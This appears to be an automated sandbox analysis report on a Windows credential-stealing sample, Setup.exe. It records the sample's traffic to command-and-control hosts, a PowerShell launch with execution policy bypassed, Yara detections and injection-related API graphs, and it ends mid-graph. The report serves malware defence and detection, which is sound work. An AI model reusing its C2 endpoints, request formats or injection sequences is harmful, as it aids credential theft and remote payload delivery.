                                                                                                                    Data Ascii: --O72ZSG6XGContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--O72ZSG6XGContent-Disposition: form-data; name="pid"1--O72ZSG6XGContent-Disposition: form-data; name="lid"jMw1IE--BARNI--O72ZSG6XGContent-Disp
                                                                                                                    2024-12-24 00:12:32 UTC1128INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=0cm3fjrg6mrqgf3oj0qkv7g475; expires=Fri, 18 Apr 2025 17:59:10 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVEcslas0OCqNqmqwuW%2FiXq8sORoFSFEwBxEa%2BaTZ4UZ54BiRoLOQtgUG9FhZif4CGdLU8k8LCyk0f4yxd98C%2Bzc4ag9cdq%2BqLlRTPepAAaf%2BIRhY5rRsR8nRexDpo1cU%2B2U"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c615aba018c33-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1964&rtt_var=743&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1972&delivery_rate=1465127&cwnd=245&unsent_bytes=0&cid=fd41f94eaf9751b4&ts=684&x=0"
                                                                                                                    2024-12-24 00:12:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-24 00:12:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449743104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:33 UTC265OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 114
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:33 UTC114OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32
                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--BARNI&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=26ECC2C9AA8F4E8F303C757AA71AA852
                                                                                                                    2024-12-24 00:12:34 UTC1130INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:34 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=9sl26kk9djs2j9tss3q38s6n4m; expires=Fri, 18 Apr 2025 17:59:13 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfmKkpE0QX%2BpU22fL87k%2FwVpESH54ZhBWhKV7oSwydjRqvs%2FifMY%2Fw9cxnuXunDfaH0GL1hhlk0tgQird%2FsEZhJo63XZSk0ndyJl27VOzdXet7hGypXhI2MhrCR1U%2BbVGaGa"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c6167894f5e67-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2186&min_rtt=2182&rtt_var=827&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1015&delivery_rate=1316501&cwnd=243&unsent_bytes=0&cid=c5d618240ffed894&ts=776&x=0"
                                                                                                                    2024-12-24 00:12:34 UTC222INData Raw: 64 38 0d 0a 72 65 39 57 56 4d 64 58 5a 48 5a 4a 43 6a 5a 6b 4f 4b 4c 62 43 4f 66 66 45 4b 32 32 6c 6f 65 34 77 4f 75 63 33 44 6f 42 51 53 62 32 6c 48 51 68 35 57 31 47 48 6a 31 2b 52 68 63 43 2f 76 52 55 79 4c 46 31 33 4e 2b 34 39 4e 43 76 6d 38 44 7a 53 57 55 6d 54 4e 53 61 49 67 6a 6f 4a 78 63 65 5a 33 35 4f 45 42 71 4f 2b 57 36 54 2f 53 71 66 6d 72 54 69 6d 76 72 61 34 66 42 42 49 7a 51 45 6c 38 30 2b 49 4c 4d 6e 46 30 77 56 4a 57 70 4c 55 38 36 79 65 49 53 2b 5a 4d 6a 47 2f 2f 4b 49 37 70 6a 30 73 30 70 64 62 6b 2f 44 6d 77 6b 33 71 79 63 37 47 69 31 34 61 52 64 51 77 2f 56 38 6e 36 73 79 67 5a 54 77 38 35 72 36 32 62 44 2b 58 79 4e 37 46 39 43 79 0d 0a
                                                                                                                    Data Ascii: d8re9WVMdXZHZJCjZkOKLbCOffEK22loe4wOuc3DoBQSb2lHQh5W1GHj1+RhcC/vRUyLF13N+49NCvm8DzSWUmTNSaIgjoJxceZ35OEBqO+W6T/SqfmrTimvra4fBBIzQEl80+ILMnF0wVJWpLU86yeIS+ZMjG//KI7pj0s0pdbk/Dmwk3qyc7Gi14aRdQw/V8n6sygZTw85r62bD+XyN7F9Cy
                                                                                                                    2024-12-24 00:12:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449744104.21.27.2294436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:35 UTC199OUTGET /sdgjyut/psh.txt HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Host: neqi.shop
                                                                                                                    2024-12-24 00:12:36 UTC940INHTTP/1.1 523
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:36 GMT
                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                    Content-Length: 15
                                                                                                                    Connection: close
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tbTPw2EIJWo3fY7REUC%2BbkUylvcl1EszngRRfNSW80133pX0cQr7JtnqQfHeHScu6hWjDb5kP2XqaoKAtREBJ8nknVlwIyVY2VaRFPurmy6PkgVVKAX9GGOjdg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Referrer-Policy: same-origin
                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c6175feaf42b8-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=36052&min_rtt=34855&rtt_var=15465&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=813&delivery_rate=65718&cwnd=232&unsent_bytes=0&cid=f598c10dbea7817a&ts=679&x=0"
                                                                                                                    2024-12-24 00:12:36 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                                                    Data Ascii: error code: 523


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:19:12:04
                                                                                                                    Start date:23/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                    Imagebase:0x850000
                                                                                                                    File size:76'122'589 bytes
                                                                                                                    MD5 hash:79C238EBE5C951B14E9E4729CE73FCC9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:19:12:35
                                                                                                                    Start date:23/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:powershell -exec bypass error code: 523
                                                                                                                    Imagebase:0x720000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:19:12:35
                                                                                                                    Start date:23/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:31.6%
                                                                                                                      Total number of Nodes:117
                                                                                                                      Total number of Limit Nodes:10
                                                                                                                      execution_graph 14043 f5041f 14044 f5042d 14043->14044 14059 f50d6f 14044->14059 14046 f509b8 14047 f505c5 GetPEB 14049 f50642 14047->14049 14048 f50580 14048->14046 14048->14047 14062 f50b2f 14049->14062 14052 f506a3 CreateThread 14053 f5067b 14052->14053 14074 f509df GetPEB 14052->14074 14058 f508b3 14053->14058 14070 f5102f GetPEB 14053->14070 14055 f509a3 TerminateProcess 14055->14046 14056 f50b2f 4 API calls 14056->14058 14058->14055 14072 f50d8f GetPEB 14059->14072 14061 f50d7c 14061->14048 14063 f50b45 CreateToolhelp32Snapshot 14062->14063 14065 f50675 14063->14065 14066 f50b7c Thread32First 14063->14066 14065->14052 14065->14053 14066->14065 14067 f50ba3 14066->14067 14067->14065 14068 f50bda Wow64SuspendThread 14067->14068 14069 f50c04 CloseHandle 14067->14069 14068->14069 14069->14067 14071 f506fd 14070->14071 14071->14056 14071->14058 14073 f50daa 14072->14073 14073->14061 14077 f50a38 14074->14077 14075 f50a98 CreateThread 14075->14077 14078 f5120f 14075->14078 14076 f50ae5 14077->14075 14077->14076 14081 f999d4 14078->14081 14082 f999f9 14081->14082 14083 f99ae3 14081->14083 14117 f9c256 14082->14117 14093 f9acaf 14083->14093 14086 f99a11 14087 f9c256 LoadLibraryA 14086->14087 14092 f51214 14086->14092 14088 f99a53 14087->14088 14089 f9c256 LoadLibraryA 14088->14089 14090 f99a6f 14089->14090 14091 f9c256 LoadLibraryA 14090->14091 14091->14092 14094 f9c256 LoadLibraryA 14093->14094 14095 f9acd2 14094->14095 14096 f9c256 LoadLibraryA 14095->14096 14097 f9acea 14096->14097 14098 f9c256 LoadLibraryA 14097->14098 14099 f9ad08 14098->14099 14100 f9ad1d VirtualAlloc 14099->14100 14109 f9ad31 14099->14109 14102 f9ad4b 14100->14102 14100->14109 14101 f9c256 LoadLibraryA 14103 f9adc9 14101->14103 14102->14101 14114 f9afa4 14102->14114 14105 f9ae1f 14103->14105 14103->14109 14121 f9c05d 14103->14121 14104 f9c256 LoadLibraryA 14104->14105 14105->14104 14108 f9ae81 14105->14108 14105->14114 14107 f9b062 VirtualFree 14107->14109 14108->14114 14116 f9aee3 14108->14116 14149 f99e3f 14108->14149 14109->14092 14111 f9aecc 14111->14114 14156 f99f3a 14111->14156 14114->14107 14115 f9b001 14114->14115 14115->14115 14116->14114 14125 f9b3df 14116->14125 14118 f9c26d 14117->14118 14119 f9c294 14118->14119 14175 f9a35b 14118->14175 14119->14086 14123 f9c072 14121->14123 14122 f9c0e8 LoadLibraryA 14124 f9c0f2 14122->14124 14123->14122 14123->14124 14124->14103 14126 f9b41a 14125->14126 14127 f9b461 NtCreateSection 14126->14127 14128 f9b486 14126->14128 14148 f9ba8e 14126->14148 14127->14128 14127->14148 14129 f9b51b NtMapViewOfSection 14128->14129 14128->14148 14134 f9b53b 14129->14134 14130 f9b7c2 14131 f9b864 VirtualAlloc 14130->14131 14133 f9c05d LoadLibraryA 14130->14133 14137 f9b860 14130->14137 14161 f9c0fb 14130->14161 14139 f9b8a6 14131->14139 14132 f9c05d LoadLibraryA 14132->14134 14133->14130 14134->14130 14134->14132 14138 f9c0fb LoadLibraryA 14134->14138 14134->14148 14135 f9b957 VirtualProtect 14136 f9ba22 VirtualProtect 14135->14136 14144 f9b977 14135->14144 14141 f9ba51 14136->14141 14137->14131 14138->14134 14139->14135 14146 f9b944 NtMapViewOfSection 14139->14146 14139->14148 14140 f9bb9c 14142 f9bba4 CreateThread 14140->14142 14140->14148 14141->14140 14141->14148 14165 f9be10 14141->14165 14142->14148 14144->14136 14147 f9b9fc VirtualProtect 14144->14147 14146->14135 14146->14148 14147->14144 14148->14114 14150 f9c05d LoadLibraryA 14149->14150 14151 f99e53 14150->14151 14152 f99e5b 14151->14152 14153 f9c0fb LoadLibraryA 14151->14153 14152->14111 14154 f99e73 14153->14154 14154->14152 14155 f9c0fb LoadLibraryA 14154->14155 14155->14152 14157 f9c05d LoadLibraryA 14156->14157 14158 f99f50 14157->14158 14159 f9c0fb LoadLibraryA 14158->14159 14160 f99f60 14159->14160 14160->14116 14162 f9c116 14161->14162 14164 f9c22c 14161->14164 14162->14164 14169 f9a500 14162->14169 14164->14130 14168 f9be38 14165->14168 14166 f9c02a 14166->14140 14167 f9c0fb LoadLibraryA 14167->14168 14168->14166 14168->14167 14170 f9a545 14169->14170 14173 f9a51f 14169->14173 14171 f9c05d LoadLibraryA 14170->14171 14172 f9a552 14170->14172 14171->14172 14172->14164 14173->14170 14173->14172 14174 f9c0fb LoadLibraryA 14173->14174 14174->14173 14176 f9a460 14175->14176 14177 f9a37b 14175->14177 14176->14118 14177->14176 14178 f9a500 LoadLibraryA 14177->14178 14178->14176
                                                                                                                      APIs
                                                                                                                      • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00F9B478
                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000), ref: 00F9B520
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00F9B894
                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00F9B949
                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00F9B966
                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00F9BA09
                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00F9BA3C
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00F9BBAD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1248616170-0
                                                                                                                      • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                      • Instruction ID: 0dde0cdbfa95be85e684733f924746c760c786c5342039d18f021c44627a35bf
                                                                                                                      • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                      • Instruction Fuzzy Hash: CA42AB72A08301AFEB24CF24DD84B6BB7E8EF88714F14492DF9859B251D770E940DB92

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 187 f5041f-f50587 call f509cf call f50fcf call f5117f call f50d6f 196 f5058d-f50594 187->196 197 f509b8-f509bb 187->197 198 f5059f-f505a3 196->198 199 f505c5-f50640 GetPEB 198->199 200 f505a5-f505c3 call f50eef 198->200 202 f5064b-f5064f 199->202 200->198 203 f50667-f50679 call f50b2f 202->203 204 f50651-f50665 202->204 210 f506a3-f506c4 CreateThread 203->210 211 f5067b-f506a1 203->211 204->202 212 f506c7-f506cb 210->212 211->212 214 f506d1-f50704 call f5102f 212->214 215 f5098c-f509b6 TerminateProcess 212->215 214->215 219 f5070a-f50759 214->219 215->197 221 f50764-f5076a 219->221 222 f507b2-f507b6 221->222 223 f5076c-f50772 221->223 226 f50884-f50977 call f50b2f call f509cf call f50fcf 222->226 227 f507bc-f507c9 222->227 224 f50785-f50789 223->224 225 f50774-f50783 223->225 228 f507b0 224->228 229 f5078b-f50799 224->229 225->224 253 f5097c-f50986 226->253 254 f50979 226->254 230 f507d4-f507da 227->230 228->221 229->228 231 f5079b-f507ad 229->231 234 f507dc-f507ea 230->234 235 f5080a-f5080d 230->235 231->228 238 f507ec-f507fb 234->238 239 f50808 234->239 236 f50810-f50817 235->236 236->226 240 f50819-f50822 236->240 238->239 242 f507fd-f50806 238->242 239->230 240->226 244 f50824-f50834 240->244 242->235 246 f5083f-f5084b 244->246 248 f5084d-f5087a 246->248 249 f5087c-f50882 246->249 248->246 249->236 253->215 254->253
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00F506C2
                                                                                                                      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00F509B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcessTerminateThread
                                                                                                                      • String ID: ^$esGo$y_q
                                                                                                                      • API String ID: 1197810419-1552005304
                                                                                                                      • Opcode ID: 990791149b283cd096f1c3f16cf0b8debaab34caef6c0c011a5c64a9ab0219a9
                                                                                                                      • Instruction ID: 0407c42b9223dd8117cf8583d25dd38a753e2a13f32fc40dc71de31f0c8f540a
                                                                                                                      • Opcode Fuzzy Hash: 990791149b283cd096f1c3f16cf0b8debaab34caef6c0c011a5c64a9ab0219a9
                                                                                                                      • Instruction Fuzzy Hash: 5B12F3B1E00209DFDB14CF98C991BADBBB2FF88305F2482A9D905AB385C7346A45DF54

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 255 f50b2f-f50b76 CreateToolhelp32Snapshot 258 f50c4c-f50c4f 255->258 259 f50b7c-f50b9d Thread32First 255->259 260 f50ba3-f50ba9 259->260 261 f50c38-f50c47 259->261 262 f50c18-f50c32 260->262 263 f50bab-f50bb1 260->263 261->258 262->260 262->261 263->262 264 f50bb3-f50bd2 263->264 264->262 267 f50bd4-f50bd8 264->267 268 f50bf0-f50bff 267->268 269 f50bda-f50bee Wow64SuspendThread 267->269 270 f50c04-f50c16 CloseHandle 268->270 269->270 270->262
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00F50675,?,00000001,?,81EC8B55,000000FF), ref: 00F50B6D
                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 00F50B99
                                                                                                                      • Wow64SuspendThread.KERNEL32(00000000), ref: 00F50BEC
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F50C16
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1849706056-0
                                                                                                                      • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                      • Instruction ID: 9f88c71b0b5e30e01dfb4efb5fb28d720a77f950818f7063b6a91de4bc97f42f
                                                                                                                      • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                      • Instruction Fuzzy Hash: 15410D71A00108AFDB18DF98C494FADB7F6EF89310F50C168EA159B7A4DB34AE45CB94

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 271 f509df-f50a36 GetPEB 272 f50a41-f50a45 271->272 273 f50ae5-f50aec 272->273 274 f50a4b-f50a56 272->274 275 f50af7-f50afb 273->275 276 f50ae0 274->276 277 f50a5c-f50a73 274->277 279 f50afd-f50b0a 275->279 280 f50b0c-f50b13 275->280 276->272 281 f50a75-f50a96 277->281 282 f50a98-f50ab0 CreateThread 277->282 279->275 285 f50b15-f50b17 280->285 286 f50b1c-f50b21 280->286 283 f50ab4-f50abc 281->283 282->283 283->276 288 f50abe-f50adb 283->288 285->286 288->276
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00F50AAB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 2422867632-3772416878
                                                                                                                      • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                      • Instruction ID: 066fd50c6a7d00ad24adcc950c499446aec38c7395aedf300a680d6ac0c911d0
                                                                                                                      • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                      • Instruction Fuzzy Hash: 1A41C474E00209EFDB04CF98C994BAEB7B1BF88315F208198D915AB381C775AE85DF94

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 290 f9c05d-f9c070 291 f9c088-f9c092 290->291 292 f9c072-f9c075 290->292 294 f9c0a1-f9c0ad 291->294 295 f9c094-f9c09c 291->295 293 f9c077-f9c07a 292->293 293->291 296 f9c07c-f9c086 293->296 297 f9c0b0-f9c0b5 294->297 295->294 296->291 296->293 298 f9c0e8-f9c0ef LoadLibraryA 297->298 299 f9c0b7-f9c0c2 297->299 300 f9c0f2-f9c0f6 298->300 301 f9c0de-f9c0e2 299->301 302 f9c0c4-f9c0dc call f9c72b 299->302 301->297 304 f9c0e4-f9c0e6 301->304 302->301 306 f9c0f7-f9c0f9 302->306 304->298 304->300 306->300
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00F9C0EF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID: .dll
                                                                                                                      • API String ID: 1029625771-2738580789
                                                                                                                      • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                      • Instruction ID: bedc20289fc1f635998a854d9d1d385916ea68b01aebc92666e6a4bab7b1a465
                                                                                                                      • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                      • Instruction Fuzzy Hash: 8D21E476A04295CFFF22CFADC844A697BA4AF01360F18416DD806DBA51D730EC46DBC0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 307 f9acaf-f9ad13 call f9c256 * 3 314 f9ad3d 307->314 315 f9ad15-f9ad17 307->315 316 f9ad40-f9ad4a 314->316 315->314 317 f9ad19-f9ad1b 315->317 317->314 318 f9ad1d-f9ad2f VirtualAlloc 317->318 319 f9ad4b-f9ad6e call f9c6cb call f9c6ef 318->319 320 f9ad31-f9ad38 318->320 326 f9adb8-f9add1 call f9c256 319->326 327 f9ad70-f9ada6 call f9c3c3 call f9c299 319->327 320->314 321 f9ad3a 320->321 321->314 326->314 332 f9add7 326->332 338 f9adac-f9adb2 327->338 339 f9b007-f9b010 327->339 334 f9addd-f9ade3 332->334 336 f9ae1f-f9ae28 334->336 337 f9ade5-f9adeb 334->337 341 f9ae2a-f9ae30 336->341 342 f9ae81-f9ae8c 336->342 340 f9aded-f9adf0 337->340 338->326 338->339 343 f9b012-f9b015 339->343 344 f9b017-f9b01f 339->344 349 f9adf2-f9adf7 340->349 350 f9ae04-f9ae06 340->350 351 f9ae34-f9ae4f call f9c256 341->351 347 f9ae8e-f9ae97 call f99fa3 342->347 348 f9aea5-f9aea8 342->348 343->344 345 f9b04e 343->345 344->345 346 f9b021-f9b04c call f9c6ef 344->346 353 f9b052-f9b072 call f9c6ef VirtualFree 345->353 346->353 358 f9b003 347->358 370 f9ae9d-f9aea3 347->370 357 f9aeae-f9aeb7 348->357 348->358 349->350 355 f9adf9-f9ae02 349->355 350->336 356 f9ae08-f9ae16 call f9c05d 350->356 367 f9ae6e-f9ae7f 351->367 368 f9ae51-f9ae59 351->368 378 f9b078-f9b07a 353->378 379 f9b074 353->379 355->340 355->350 371 f9ae1b-f9ae1d 356->371 365 f9aeb9 357->365 366 f9aebd-f9aec4 357->366 358->339 365->366 372 f9aef4-f9aef8 366->372 373 f9aec6-f9aecf call f99e3f 366->373 367->342 367->351 368->358 374 f9ae5f-f9ae68 368->374 370->366 371->334 376 f9af9a-f9af9d 372->376 377 f9aefe-f9af20 372->377 384 f9aedd-f9aee6 call f99f3a 